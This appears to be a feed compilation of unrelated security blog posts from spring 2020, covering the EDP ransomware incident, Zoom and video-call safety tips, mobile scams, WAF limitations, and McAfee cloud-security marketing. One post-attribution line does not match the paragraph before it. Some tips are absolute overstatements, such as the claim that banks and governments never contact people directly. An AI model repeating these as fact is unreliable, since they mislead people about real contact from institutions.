One of the largest energy providers in Europe, Energias de Portugal (EDP), became the victim of a ransomware attack that used the RagnarLocker variant. In exchange for the estimated 10TB of data stolen during the attack, attackers demanded a ransom of $10.9m to be paid in cryptocurrency. The authors behind RagnarLocker have already begun posting segments of the stolen data to their main website, along with the promise to release the rest and make their entire client list aware of the breach, if the ransom isn’t met.

The post Cyber News Rundown: Ransomware Wrecks Florida City appeared first on Webroot Blog.

Weekly Update 187


Spiders! Ok, not your normal start to a weekly update but yeah, we had a bit of an infestation this week which did take the mind off other current events for a while. Much of what's happened beyond that this week has resulted in various tweet storms; the Zoom credential stuffing situation, the Coronavirus tracking app (holy cow that has some "robust" debate around it) and the (seemingly endless) thread of progress as I build up my Ubiquiti network. All that and more in the vid below!


  1. If you don't like spiders then don't click this link (wonder how many of them are still crawling around in the air conditioning unit...)
  2. No, there isn't a "Zoom data breach" and yes, people keep using shitty passwords (c'mon media, it's not hard to report on this accurately!)
  3. The Coronavirus tracking app tweet storm (less than a day on and apparently, it's had 125k impressions so it's clearly getting some traction, but it's divisive)
  4. Speaking of tweet storms, check out my Ubiquiti build! (this project has brought me so much joy)
  5. The Icelandic government is now on Have I Been Pwned (they're the 10th national government to have full access to query their gov domains)
  6. Sponsored by: SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Application Security? But I Have a WAF!

Updated 4/16/2020. Originally published 12/28/2016.

It seems so tempting. Solve your application security problem by throwing an appliance at it. After all, if web applications are the most common form of attack, why not just protect them the same way you protect your network and email servers, and be done with it? Why should you spend time hunting down vulnerabilities in your code and figuring out how to fix them?

The “appliance throwing” approach would be viable if web application firewalls (WAFs) were perfect, but protecting your app layer with only a WAF leaves a lot of holes. WAFs, at their heart, are black-box protection technologies that rely on inspecting incoming traffic for known attack patterns, and that’s often not enough. There are circumstances where WAFs will leave you vulnerable to attack, for instance:


Missed attack due to new patterns

A WAF tries to use known attack patterns to protect an application. It can be tuned via writing rules, but attackers are coming up with new patterns all the time. In fact, creating WAF bypasses is something of a cottage industry for security researchers, to the point that you can download cheat sheets for creating WAF bypasses from security researchers like @Pentestit_ru and @themiddleblue, the editor-in-chief from 1337pwn, or the well-known OWASP foundation.

And that’s not even including the risk of new vulnerability categories. Veracode Community member Mark Merkow from HealthEquity notes, “Even if a WAF is configured 100 percent correctly and catches and stops attacks it knows about successfully and every time, it's still at risk for letting new attacks through, including zero-day attacks. With Web Services and API communications as the most likely future form for all apps, WAFs will become less and less useful. What will survive in this new world are well-written, high-quality, resilient applications that can stand up to endless attacks.”


Missed attack due to application changes

Based on the results of a penetration test or other evaluation of an application, you can make a WAF very accurate by creating rules that focus on specific input fields and types of vulnerability. However, you have to maintain these rules every time the application is changed. The SANS Institute notes, “During the WAF deployment, everyone involved understands exactly which form fields and inputs are vulnerable and to which attack categories but, over time, this knowledge fades. Many organizations lack the in-house expertise to conduct penetration tests every time they change the web application or WAF configuration (and miss the opportunity to ensure a vulnerability was not introduced).”

SANS issued this report over five years ago. In the intervening years, the frequency of application updates has only gotten higher thanks to increased adoption of agile software development and DevOps. This means that the window of time during which a WAF configuration should not require updates due to application changes has dramatically decreased.


Missed attack due to configuration complexity

The same SANS report notes that it’s not uncommon for WAFs to be extended to cover more applications than they can handle, to fail under high load, or to have a high number of false positives. For this reason, some organizations configure their WAFs to alert only in the event of a potential attack, rather than try to block it, which means that a successful attack will likely be missed in the midst of other alerts from the WAF.

There are definitely still benefits to deploying WAFs, including avoidance of denial of service attacks and, when properly configured, some protection against an attack. If nothing else, they slow an attacker down.


No application security silver bullet

Effective application security requires multiple technologies that protect apps in different ways and in different stages of their lifecycle. As Veracode Community member Glico Man said in a recent comment, “WAF is a ‘safety net’ and may provide ‘virtual patching’ until the application code is fixed… A well-configured WAF will provide more time for a developer to fix their code.”

If you’re going to use a WAF, you won’t be protecting your products from attack indefinitely. So use the time a WAF gives you wisely; figure out where the underlying vulnerabilities are in your application and fix them. For instance, consider an automated application security solution that integrates into your SDLC, allowing developers to find and remediate security-related defects early in the development process.


Cyberattackers are increasingly focused on the application layer; it’s critical to understand both how this layer is being exploited, and which solutions protect it most effectively. To learn more about application security solutions and where to start, check out the Ultimate Guide to Getting Started With AppSec or visit the Veracode Community page.


Due to the scale of the pandemic, ever more businesses and government institutions are enforcing ‘work from home’ policies in order to keep their employees safe and healthy, and to keep the business going. Social interactions today come down to video calls, social media posts and communicating via instant messaging platforms, and many of us are making use of Zoom.

In this context, a cyberattack that deprives organisations and families of access to the internet, their devices or data could be devastating – Zoom has had a bunch of security scares recently, as huge numbers of new users flock to it, and as cybercriminals try to take advantage of that. Fortunately, a lot of the problems and risks people are having can be reduced enormously just by getting the basics right.

So here are “things to get right first” – they shouldn’t take you long, and they are easy to do to keep your Zoom safer.

1. Pick the right password.
When setting up a Zoom account, it is highly recommended to use a good, strong password. Do not share it, change it as often as you can, and make sure you do not reuse the password.

2. Patch early, patch often
Zoom’s own CEO just wrote a blog post announcing a “feature freeze” in the product so that the company can focus on security issues instead. It’s much easier to do that if you aren’t adding new code at the same time.

Why not get into the habit of checking you’re up-to-date every day, before your first meeting? Even if Zoom itself told you about an update the very last time you used it, get in the habit of checking by hand anyway, just to be sure. It doesn’t take long.

3. Use the Waiting Room option
Set up meetings so that the participants can’t join in until you open it up.
And if you suddenly find yourself “on hold until the organiser starts the meeting” when in the past you would have spent the time chatting to your colleagues and getting the smalltalk over with, don’t complain – those pre-meeting meetings are great for socialising but they do make it harder to control the meeting.

4. Take control over screen sharing
Until recently, most Zoom meetings took a liberal approach to screen sharing. Unfortunately, this allows others to share inappropriate content and cause trouble.
Actually, it’s not just screen sharing that can cause trouble. There are numerous controls you can apply to participants in meetings, including blocking file sharing and private chat, kicking out disruptive users, and stopping troublemakers coming back.

5. Use random meeting IDs and set meeting passwords
We know lots of Zoom users who memorised their own meeting ID long ago and had fallen into the habit of using it for every meeting they held – even back-to-back meetings with different groups – because they knew they’d never need to look it up.

But that convenience is handy for crooks, too, because they already have a list of known IDs that they can try automatically in the hope of wandering in where they aren’t supposed to be.

It is recommended to use a randomly generated meeting ID, and to set a password on any meeting that is not explicitly open to all. You can send the web link by one means, e.g. in an email or invitation request, and the password by another means, e.g. in an instant message just before the meeting starts. (You can also lock meetings once they start to avoid unwanted visitors after you’ve started concentrating on the meeting itself.)

6. Make some rules of etiquette and stick to them.
Etiquette may sound like a strange bedfellow for cybersecurity, and perhaps it is.
But respect for privacy, a sense of trust, and a feeling of social and business comfort are also important parts of a working life that’s now dominated by online meetings.
If you’re expected or you need to use video, pay attention to your appearance and the lighting. (In very blunt terms: try to avoid being a pain to watch.) Remember to use the mute button when you can.

And most importantly – especially if there are company outsiders in the meeting – be very clear up front if you will be recording the meeting, even if you are in a jurisdiction that does not require you to declare it. And make it clear if there are any restrictions, albeit informal ones, about what the participants are allowed to do with the information they learn in the meeting.

Etiquette isn’t about keeping the bad guys out. But respectful rules of engagement for remote meetings help to make it easy for everyone in the meeting to keep the good stuff in.

Welcoming the Icelandic Government to Have I Been Pwned


Hot on the heels of onboarding the USA government to Have I Been Pwned last month, I'm very happy to welcome another national government - Iceland! As of today, Iceland's National Computer Security Incident Response Team (CERT-IS), now has access to the full gamut of their gov domains for both on-demand querying and ongoing monitoring.

As with the USA and Iceland, I expect to continue onboarding additional governments over the course of 2020 and expanding their access to meaningful data about breaches that impact their departments.

NICE Webinar: The Role of the School Counselor in Promoting Cybersecurity Career Opportunities

The PowerPoint slides used during this webinar can be downloaded here.

Speakers:

  • Jill Cook, Assistant Director, American School Counselor Association
  • Dr. Samantha Haviland, Director of School Counseling, Denver Public Schools
  • Nwakaego Oriji, School Counselor Facilitator, Garland Independent School District
  • Amy Dauble-Madigan, School Counselor, El Marino Language School

Synopsis: The role of the school counselor has evolved over the past two decades, including ensuring that students are equipped with information about educational and career options in cybersecurity and other STEM-related fields

The Latest Mobile Scams & How To Stay Safe

If the challenges of working from home, connecting with family, and keeping on top of the news have you grabbing your phone more than ever, you’re not alone. Unfortunately, scammers are capitalizing on this opportunity. From fake apps and dangerous text messages to phishing phone calls, mobile scams are multiplying, potentially putting your personal data and devices at risk.

In fact, the Federal Trade Commission recently warned that it has received a spike in user complaints as fraudsters look to take advantage of the current state of affairs. Fortunately, there are a few things you can do to protect your privacy and security.

But first, here are a few things to watch out for:

Fake Apps

Looking for apps to help you track health information and find supplies? The scammers have you covered. They’ve released a number of malicious health-related apps designed to track you instead. These phony apps may ask for access to your photos, files, and location, or use spyware that can remotely turn on your camera or microphone.

One dodgy app offers to help you locate N-95 masks, but don’t download it. If you do, the app locks your device and demands a ransom to unlock it. This just shows how common forms of attack, like ransomware, evolve with current events.

Another handful of phony apps making the rounds appear to be for the popular video conferencing platform Zoom, which has seen exponential growth as more people work from home. But installing these phony apps can download malware instead, so make sure you download the official company app.

Risky Text Messages

Phishing by text message, or “smishing,” continues to be a popular way to hook mobile users. The scammers are usually trying to get you to click on a link, which sends you to a risky website or downloads malware onto your device. We’ve seen recent smishing attempts asking to verify personal and banking information in order to “release” government stimulus funds or consolidate debt. Others attempt to sell you in-demand medical supplies at a discount, such as surgical masks, or fake health insurance.

Sometimes the senders will “spoof” a government or business phone number, so it appears to come from an official entity. Just remember that governments and banks will never contact you directly, asking for personal information or money.

Phishing Calls

With voice-over-internet technology making robocalls cheap and easy, the scammers can’t help but inundate us with new topical scams. We’ve seen reports of robocalls offering phony medical treatments or free test kits if you respond with your information. Others include charity requests, such as one that appears to come from the World Health Organization, asking for a donation to an emergency relief fund.

How to Stay Safe

Scammers always try to take advantage of uncertainty and big news events that capture our attention. Here’s how to stay safe:

Be hyperaware when receiving any type of call or message

Always be suspicious of unsolicited calls, texts, social media messages, and e-mails. If you question the identity of the person, it is best not to interact at all. If a suspicious message appears to come from a friend, call them directly to see if their phone was hacked. Do not click on links or open attachments from anyone unless you’re sure the communication is authentic.

Never share your personal or financial data

Never give your personal and financial information over the phone or via text. If you are pressured to do so, go directly to the source: call the supposed institution asking for your information directly.

Be careful about which apps you download

Only download apps from reputable app stores and check the app’s reviews before purchasing.

Look into a spam blocker

Many phone carriers offer a service or app that helps identify and filter out spam calls. This can help greatly minimize those phishing calls.

Practice safe surfing & shopping

When surfing or shopping on your mobile device, go directly to the legitimate website or reputable app instead of clicking on links in messages. You can also avoid risky websites by having the Safe Web (safe browsing tool) turned on in McAfee Mobile Security.

Keep your devices secure and protected

Keep your device protected with mobile security software. Products like McAfee Mobile Security perform regular scans to help protect you from malware and ensure that your apps are safe.


The post The Latest Mobile Scams & How To Stay Safe appeared first on McAfee Blogs.

Custom Applications with CASB

More and more organizations are making the decision to move their legacy, in-house applications to the cloud mainly due to the cost savings. One of the major concerns about moving applications to the cloud is how to secure an application that was originally designed to be on-premise.

When these applications were behind on-premise network security there was not a concern about who would be able to access them and what they were doing in the application. Moving to the cloud now introduces this dynamic and with it concerns around how to control who accesses the applications once they are in the cloud.

This move to the cloud now also opens the door to accessing applications from anywhere in the world and potentially any device. Being able to have visibility into where a user is logging in from geographically as well as what activities a user takes beyond an initial login and the context upon which that access occurs will help keep the data secure.

These same applications may have relied on a local directory to store attachments or documents. Moving to the cloud would likely mean storing those same attachments or documents in a cloud-based directory like Amazon Web Services (AWS) Simple Storage Service (S3) or Microsoft Azure Blob Storage.

When on-premises, exposure of the application or of information within the application would typically be limited to a corporate-wide incident. If access settings in the cloud are misconfigured, the exposure is much larger.

These capabilities can be added easily and quickly to applications being moved to the cloud by leveraging an API framework in the model. Incorporating an API framework would provide the following capabilities:

  1. Prevent unauthorized sensitive data from being stored in cloud collaboration, file-sharing, or storage devices
  2. Capture a complete audit trail of all user activity for forensic investigations
  3. Detect malware, compromised accounts, privileged access misuse and insider threats
  4. Successful/failed login attempts
  5. Who is accessing the application, device type, IP address, role of the user and geographic location
  6. How much data is being accessed, created, updated, deleted, downloaded, shared, or uploaded

MVC for Custom Applications will enable organizations to enforce CASB policies without the need for developers to spend a lot of valuable time writing code. This will allow legacy applications to have security policies enforced on them by the MVC CASB, whether the application is in a private data center or in the cloud.

To learn more about McAfee’s cloud solutions, check out McAfee MVISION Cloud Portfolio.

The post Custom Applications with CASB appeared first on McAfee Blogs.

Home Network Design – Part 2

Ethan Robish // Why Segment Your Network? Here’s a quick recap from Part 1. A typical home network is flat. This means that all devices are connected to the same router and are on the same subnet. Each device can communicate with every other with no restrictions at the network level. This network’s first line […]

The post Home Network Design – Part 2 appeared first on Black Hills Information Security.

NIST and OSTP Launch Effort to Improve Search Engines for COVID-19 Research

GAITHERSBURG, Md. — Today, the U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) and the White House Office of Science and Technology Policy (OSTP) launched a joint effort to support the development of search engines for research that will help in the fight against COVID-19. The project was developed in response to the March 16 White House Call to Action to the Tech Community on New Machine Readable COVID-19 Dataset. “Our nation’s scientific enterprise is mobilized to defeat the invisible enemy that is COVID-19,” said Secretary of Commerce Wilbur Ross. “Our

Secure Together: video conferencing, credential stuffing and eye strain

As we enter the fourth week of the lockdown, you’ve hopefully begun to find a routine in your new work arrangement.

Perhaps you’re able to get out of bed and shower before logging on instead of lying in bed until 8:55 am and crawling to your desk. Maybe you feel less guilty about having a mid-morning video chat with a colleague in lieu of your normal coffee break.

And fingers crossed you’re accustomed by now to saving up your one daily trip outdoors so that you have something to look forward to.

Despite the absurdity of all this, the one thing that makes it almost bearable is knowing that we’re all in it together. That’s why each week we’re sharing our experiences, advice and guidance on how to manage through the pandemic.

Let’s take a look at what this week has to offer.

Cyber attacks

The video conferencing platform Zoom has been heavily criticised in recent weeks, amid a series of allegations related to its inadequate cyber security and privacy measures.

It’s perhaps therefore not a surprise to learn that the login credentials of more than 500,000 Zoom accounts have been found for sale on the dark web.

Researchers believe the information was compromised elsewhere, but the attackers used credential stuffing to confirm that people had reused their passwords on Zoom.

In other words, if you created a Zoom account using the same username and password that you’ve used elsewhere, attackers may have been able to access your account.

It’s worth emphasising, then, that for all of Zoom’s security faults, the blame for this incident lies with users rather than the platform.

To put it bluntly: there is nothing Zoom could have done to prevent this. It’s up to each of us to make sure we exercise good password practices whatever service we use, and part of that involves using a unique password for each account that we create.

Phishing scams

We recently discussed the threat of coronavirus-related phishing scams targeting the elderly, who are perhaps most at risk of falling victim due to their susceptibility to both criminal schemes and COVID-19.

The criminals’ ploys include creating bogus websites supposedly selling facemasks, and text messages imitating the government that claim that the recipient is being fined for breaking social distancing guidelines.

With scams like these netting cyber criminals more than £1.6 million, Trading Standards agencies across the UK have stepped in, urging people to act cautiously.

Louise Boyall, a team leader for Leicestershire Trading Standards, said: “We are calling on the elderly and the vulnerable, especially, to be on their guard.

“Unscrupulous criminals will always try to exploit a crisis, unfortunately, and exploit those members of society most at risk.”

Meanwhile, Trading Standards officers in Carmarthenshire have been carrying out welfare calls to vulnerable residents, and Cambridgeshire and Peterborough Trading Standards Service is asking people to report any online products that claim to protect people from coronavirus that haven’t been provided by a reputable supplier.

Expert advice

Video conferencing has become one of the main ways that employees communicate with each other during the coronavirus pandemic, but it’s not just software vulnerabilities that you need to be concerned about. You also need to be careful about mistakes you make when using the software.

In addition to poor password practices, as we discussed above, employees might forget that they have their camera or microphone on, which could result in them sharing information with unauthorised personnel or otherwise finding themselves in embarrassing and unprofessional situations.

Likewise, employees should be careful about what’s visible on their screen. This is most likely to be a problem if you have a whiteboard in your office on which work or personal details (such as your Wi-Fi password) are written.

Some video conferencing platforms include features that allow you to blur or mask your background, which is helpful if you want to avoid these risks.

Meanwhile, it’s always worth considering what information you might be sharing via these services. Just because you are working from home, it doesn’t mean you should neglect office protocols regarding protecting sensitive data.

IT Governance employee tips for working from home

Even though the lockdown is starting to feel a little more normal, new problems are never far away. For example, when we caught up with our Head of Marketing James Warren, we learned that he’d noticed a problem arising from his new work set-up.

“Anyone that wears contact lenses will be very aware that they sometimes make your eyes feel tired and dry, and that could lead to eye strain and headaches,” he said.

“I’ve noticed in the last week that I’m spending more time looking at my screen than usual, due to [having so many] online meetings […] and therefore have been suffering more than usual.”

He said one of the ways he’s addressed this problem is to take more frequent breaks – something you should be mindful of even if you don’t wear contact lenses. Getting away from the screen, and preferably going outside, helps prevent eye strain, as you aren’t just focusing on the foreground.

James also found that switching to glasses as early into the evening as possible helped prevent further eye strain.

Free brochure: Managing remote workers’ mental health

Our mental wellbeing has been almost as big of a concern during the lockdown as our physical health. Being shut inside, either by ourselves or cooped up with family or housemates (either of which is conceivably worse than the other), is bound to take its toll, and could manifest itself in the workplace through fractious relationships with colleagues or in slips in productivity.

Our free guide – Managing Remote Workers: With a mind to mental health – helps organisations anticipate and address these problems.

It advises managers on the steps they can take to help an isolated workforce stay connected and how to spot signs that something might not be right with an employee. Perhaps there’s something about a way they’re acting in a video call or the tone of their emails or IMs that suggests they’re struggling.

With this guide, you can navigate these problems before they turn into something serious. After all, the coronavirus pandemic is tough enough without internal quarrels to worry about.

Coronavirus: your biggest challenge yet

Between a stumbling economy, coronavirus-related scams and concerns over employees’ mental health, organisations have a lot on their plates at the moment.

When you factor in the additional risks – such as an increased reliance on technology to share information and a weakened cyber security set-up with employees working from home – the pandemic poses serious problems that can’t be ignored.

That’s why we’ve put together a series of packaged solutions to help you tackle whatever comes your way. We have tools and services to help you address business continuity management, for example, as well as remote working best practices and network vulnerabilities.

Meanwhile, we’re offering 25% off our certified online training courses throughout May – which are available in several remote learning options.

Find out more

The post Secure Together: video conferencing, credential stuffing and eye strain appeared first on IT Governance UK Blog.

How to Keep Your Video Conferencing Meetings Secure

Guest Post by Tom Kellermann (Head Cybersecurity Strategist, VMware Carbon Black)

The sudden and dramatic shift to a mobile workforce has thrust video conferencing into the global spotlight and evolved video conferencing vendors from enterprise communication tools to critical infrastructure.

During any major (and rapid) technology adoption, cyberattackers habitually follow the masses in hopes of launching an attack that could lead to a pay day or give them a competitive advantage. This has not been lost on global organisations’ security and IT teams, who are quickly working to make sure their employees’ privacy and data remains secure.

Here are some high-level tips to help keep video conferencing secure.

Update the Application
Video conferencing providers are regularly deploying software updates to ensure that security holes are mitigated.  Take advantage of their diligence and update the app prior to using it every time.

Lock meetings down and set a strong password
Make sure that only invited attendees can join a meeting. Using full sentences with special characters included, rather than just words or numbers, can be helpful. Make sure you are not sharing the password widely, especially in public places and never on social media. Waiting room features are critical for privacy as the meeting host can serve as a final triage to make sure only invited participants are attending. Within the meeting, the host can restrict sharing privileges, leading to smoother meetings and ensuring that uninvited guests are not nefariously sharing materials. 

Discussing sensitive information
If sensitive material must be discussed, ensure that the meeting name does not suggest it is a top-secret meeting, which would make it a more attractive target for potential eavesdroppers.  Using code words to depict business topics is recommended during the cyber crime wave we are experiencing.

Restrict the sharing of sensitive files to approved file-share technologies, not as part of the meeting itself
Using an employee sharing site that only employees have access to (and has multi-factor authentication in place) is a great way to make sure sensitive files touch the right eyes only.  This should be mandated as this is a huge Achilles heel.

Use a VPN to protect network traffic while using the platform 
With so many employees working remotely, using a virtual private network (VPN) can help better secure internet connections and keep private information private via encryption. Public WiFi can be a gamble as it only takes one malicious actor to cause damage.  Do not use public WiFi, especially in airports or train stations.  Cyber criminals lurk in those locations.

If you can, utilise two networks on your home WiFi router, one for business and the other for personal use.
Make sure that your work computer is only connected to a unique network in your home. All other personal devices – including your family’s – should not be using the same network. The networks and routers in your home should be updated regularly and, again, should use a complex password. Additionally, you should be the only system administrator on your network and all devices that connect to it.

All of us have a role to play in mitigating the cyber crime wave. Please remember these best practices the next time you connect. Stay safe online.

Also related - How Safe are Video Messaging Apps such as Zoom?

Five Tips from McAfee’s Remote Workers

Whether you’re working from home for the first time or a remote working veteran, you may be looking for some tips to set yourself up for success as many of us practice social distancing to protect the health of our families and communities.

We turned to McAfee’s remote team members who regularly navigate working from home for advice. Incorporate the valuable practical tips or reminders, like virtual coffee breaks or lunches, below into your new routine.

  1. Get Comfortable with Technology
    “As I help my kids start online learning through Zoom, I’m reminded our customers use a variety of platforms. When you can’t meet face-to-face, get comfortable with using different platforms to stay connected with your clients. Remember, like us, technology is constantly improving so stay relevant and keep your skills fresh, practice and don’t be afraid to ask questions or pause for a quick Google search.”
    — Paige, Organizational Change Manager

  2. Separate Work and Life
    “Try to have a separate work space that detaches you from home life and distractions. Keep regular hours. Not necessarily 9-5, but routine times for work. Schedule break times to get away so you don’t get carried away with work and leverage tools like Microsoft Teams to collaborate, call, message and meet with others.”
    — Mark, Professional Services Consultant

  3. Pack Your Patience & Be Healthy
    “Life is happening right now for us, our customers, our partners and our families. This morning, it took four call backs to get through a customer call as his children were arguing in the background. We can work through this time together with patience and understanding. Schedule breaks and focus on your own health with home workouts to combat cabin fever and maintain your sanity. No equipment? No worries. A towel can replace a yoga mat and two cans from your pantry can replace weights.”
    — Brenda, North America Consumer Sales

  4. Invest in the Right Tools
    “What are some tools you’ve been eyeing that might help improve your workflow or productivity? I recently bought the Bose SoundLink Revolve to use as a speakerphone on my desk at home. It helps me block out distractions and focus. Works great!”
    — Suzette, Software Sales Account Rep

  5. Follow Instant Messaging Etiquette
    “When you can’t gauge how busy someone is sitting next to you, connect with care in response to someone’s current status availability. If someone’s status is “Busy,” consider waiting to reduce interruptions, a brief IM to see if they can talk or an email instead. And remember, brevity is key. It provides your recipient with the ability to respond if available or ignore immediately and respond later when available.”
    — Andy, Enterprise Architect

Seeking a fulfilling new career opportunity that will provide you with balance and flexibility? Search McAfee’s current openings.

The post Five Tips from McAfee’s Remote Workers appeared first on McAfee Blogs.

McAfee and Atlassian Collaborate to Deliver Cloud Security Capabilities

Today cloud adoption is considered mainstream, with 83% of enterprise workloads expected to be in the cloud by 2020. As more organizations move their workloads to the cloud and to remote work-from-home environments, security must also evolve to meet the challenges of this new normal. According to a recent McAfee report, the average enterprise organization utilizes 1,400 different cloud services, fueling the need for solutions that are designed to secure the cloud. Further, industry analyst firm Gartner warns that “through 2025, 99% of cloud security failures will be the customer’s fault.”1 This has caused enterprises to look for ways to enforce additional security controls on their cloud solutions beyond what a cloud service provider (SaaS or IaaS) offers natively.

Atlassian is a SaaS software powerhouse that builds products for content management, software development and project management, widely adopted by organizations globally. McAfee MVISION Cloud is a leading Cloud Access Security Broker (CASB) that provides comprehensive visibility and control for SaaS, PaaS, and IaaS, across Content and DevOps environments. The collaboration between Atlassian and McAfee combines their joint strengths to deliver an optimized cloud security solution for customers.

Key Customer Challenges

As enterprises adopt cloud applications, they may see the following challenges related to cloud security:

  • Users may unintentionally upload sensitive data to a cloud service (e.g. health insurance claim numbers, credit card numbers, AWS keys, etc.) in Jira Software, Confluence or other cloud applications
  • In the modern enterprise, traditional network perimeters are dissolving. Most users now use devices that sit outside the enterprise firewall to access enterprise cloud applications such as Jira Software, Confluence, Bitbucket and Bamboo.
  • Exiting employees may go rogue or leave their credentials easily accessible. The risk of insider threats, compromised user accounts or privileged access on SaaS applications needs to be addressed
  • Drift in the configuration of SaaS applications like Jira Software Cloud can cause unintentional exposure of sensitive data
  • Infrastructure code misconfiguration, or “drift” from standard benchmarks that occurs over time in a cloud environment, can expose sensitive information and increase risk.

McAfee MVISION Cloud for Atlassian Solution

McAfee MVISION Cloud for Atlassian products helps organizations securely accelerate their business in the following ways:

  • MVISION Cloud (MVC) prevents sensitive or regulated data from being uploaded or shared with unauthorized parties in real-time, while using Atlassian’s Jira Software or Confluence Cloud products. For example: detecting PII (Social Security Numbers), PCI (credit card numbers), HIPAA classified data (health insurance claim number) or other Confidential Data (Mergers & Acquisitions related documents)
  • MVISION Cloud limits download/sync to unmanaged devices and gives total control over user access to Atlassian applications by enforcing context-specific policies that limit specific end-user actions.
  • MVISION Cloud captures the complete audit trail of all user activity enriched with threat intelligence to facilitate post incident forensic investigations. MVC detects threats from compromised accounts, insider threats, privileged access misuse and malware infection.
  • Customers use a source code repository & CI/CD tools for building Cloud Native applications. McAfee MVISION Cloud integration with Atlassian’s Bitbucket Cloud and Bamboo products helps detect drifts in configuration from standard CIS benchmarks. It also ensures that data is protected on misconfigured resources or just simply within these applications

Atlassian-McAfee Collaboration Benefits

To summarize, a chain is only as strong as its weakest link. The collaboration between Atlassian and McAfee combines their joint strengths to deliver an optimized cloud security solution that is a win-win for the customer as well as the cloud provider.

Shared Right: Security is a shared responsibility between Customers and Cloud Providers

Atlassian’s cloud tools are mission critical to customer businesses and are places where they may be storing sensitive information in Jira Software, Confluence and Bitbucket. One of the reasons that 99% of issues are expected to be attributed to the customer is that while cloud providers (including Atlassian) have invested very heavily in security and have directly addressed core challenges that an on-prem solution may cause (with updates, vulnerability monitoring, incident response, etc.), their customers may be much earlier on in their security journey. Here’s where McAfee MVISION Cloud steps in to secure the delta, by helping customers deliver on their share of the security responsibility.

For example, a large healthcare customer is using McAfee MVISION Cloud to detect any sensitive data violating compliance and regulatory policies within Jira Software or Confluence Cloud.

Shift Left: Securing DevOps by Enabling DevSecOps

As a maker of tools for development teams, Atlassian wants to make it easier for developers to build and operate secure products, while responding to security incidents more quickly and effectively. McAfee MVISION Cloud “Shift Left” can help Atlassian customers ensure that the infrastructure, and the myriad configuration options available, are deployed according to security and regulatory compliance best practices. “Shift Left” inline integration seamlessly incorporates these security checks without any extra steps required by the developers or DevOps teams.

To learn more about how McAfee-Atlassian products work together, please attend our joint webinar on May 20th, 2020.

Additional Resources:

Blog: McAfee MVISION Cloud for Atlassian Access

Blog: Shift Left Inline – Integration with Atlassian Bitbucket CI/CD Pipes



1 Source: “Smarter With Gartner” Blog, Is the Cloud Secure?, October 10, 2019, Contributor Kasey Panetta.

The post McAfee and Atlassian Collaborate to Deliver Cloud Security Capabilities appeared first on McAfee Blogs.

McAfee MVISION Cloud for Atlassian Access

Atlassian cloud products help small, medium, and big enterprises around the world to build and run their businesses effortlessly by enabling collaboration among team members both co-located and working remotely. Be it Jira for project planning and issue tracking, Confluence for document collaboration, Bitbucket for source code repository management, Opsgenie for incident management, or Jira Service Desk for customer support, all the products from Atlassian suite allow cross functional teams to achieve higher productivity in various stages of the business workflow.

However, the flexibility of being able to access cloud products from any device or location also means higher risk of potential security threats. Any enterprise using Software-as-a-Service tools is vulnerable to the following threats.

  • Compromised credentials: Stolen or compromised credentials of users or administrators through various means such as phishing can result in data breaches by letting the adversaries get access to sensitive data of the organization stored in the cloud
  • Privilege user threats: Abuse of privilege user roles or permissions can result in insider threats that pose a greater risk to organization’s data

McAfee MVISION Cloud’s integration with Atlassian Access provides an additional security layer for organizations using Atlassian tools and allows these organizations to take advantage of the productivity gains from using Atlassian’s cloud-native products without compromising on security.

By integrating with Atlassian Access’s organization audit log, McAfee MVISION Cloud creates a comprehensive audit trail of user and administrator activity to allow security admins to perform forensic investigations based on various attributes such as user, location, activity type, etc., and automatically identifies threatening or anomalous user and administrator behavior by applying machine learning to the activity feed. As a comprehensive cloud security platform, McAfee can detect cross-cloud threats that involve usage across Atlassian products and other cloud services. As threats are resolved, McAfee automatically incorporates this data into its behavioural models to improve detection accuracy.

Enterprises can benefit from the following security controls provided out-of-the-box by McAfee MVISION Cloud:

  • McAfee detects compromised account activity in Atlassian based on brute force login attempts, access from new and untrusted locations for a specific user, and user activity from multiple locations in a time period that implies impossible travel, even if the user activity occurs across multiple cloud services.
  • McAfee automatically constructs a behavior model with dynamic and continuously updated thresholds for each user and team to identify activity indicative of insider threat, whether the threat is accidental or malicious. Privileged User Analytics identifies risk from dormant administrator accounts, excessive permissions, and unnecessary escalation of privileges and user provisioning.

The post McAfee MVISION Cloud for Atlassian Access appeared first on McAfee Blogs.

Shift Left Inline – Integration with Atlassian Bitbucket CI/CD Pipes

Infrastructure-as-a-Service (IaaS) is used by organizations of all sizes as the new default IT environment to build and host internal and customer-facing applications. To leverage the numerous capabilities offered by IaaS providers for faster adoption, many organizations overlook the cloud shared-responsibility model and assume that security is taken care of completely by the cloud provider. At the end of the day, the security of what cloud customers put in the cloud, most importantly sensitive data, is their responsibility. According to leading analyst Gartner, “Through 2025, 99% of cloud security failures will be the customer’s fault.”

Per the McAfee CARR report, about 99% of misconfigurations go unnoticed by companies using IaaS. On average, companies were aware of about 37 misconfiguration incidents per month, but real-world data shows that companies actually experience closer to 3,500 such incidents – about 100 times more!

It is possible that the speed of IaaS adoption is leaving a lot of security practitioners behind, in a never-ending catch-up game. And, as expected, the flexibility offered by IaaS providers lets the infrastructure change rapidly based on ever-changing demands, so doors are left open through misconfigurations all the time. More so as the changes are made through Infrastructure as Code (IaC) in Continuous Integration/Continuous Delivery (CI/CD) fashion. While MVISION Cloud’s IaaS config audit reports on deployed infrastructure and helps to ensure it is compliant and pristine, as new resources are deployed through DevOps templates, similar compliance issues keep getting reported over and over.

Integration with Atlassian Bitbucket pipes performs ‘inline’ evaluation of the DevOps templates: any DevOps template pushed to a Bitbucket code repo that is configured to trigger a build is automatically evaluated to check for vulnerabilities present, and any misconfiguration errors are reported right in the developer’s console, highlighting all specific policies in question.

This helps DevOps personnel analyze and remediate misconfiguration issues at the source, so that any further deployment using those templates doesn’t create similar issues in the IaaS environments. Hence, the security team enforces the process and sets the guidelines, avoiding the impossible task of keeping up with an ever-growing list of non-compliant issues. The ability to enforce these checks earlier in the DevOps cycle helps immensely: the security team can delegate enforcement for any new resources that are deployed, and stop the deployment of any non-compliant DevOps templates. By adding security earlier into the DevOps process, security professionals can catch risky configurations before they become a threat in production.

The integration setup is simple: the YAML file is configured to use the McAfee MVISION Cloud Docker image along with a few environment variables. Setup completes once Pipelines is enabled. The scans support AWS CloudFormation, Azure ARM and Terraform templates. All the issues are also reported as incidents in MVISION Cloud’s dashboard.

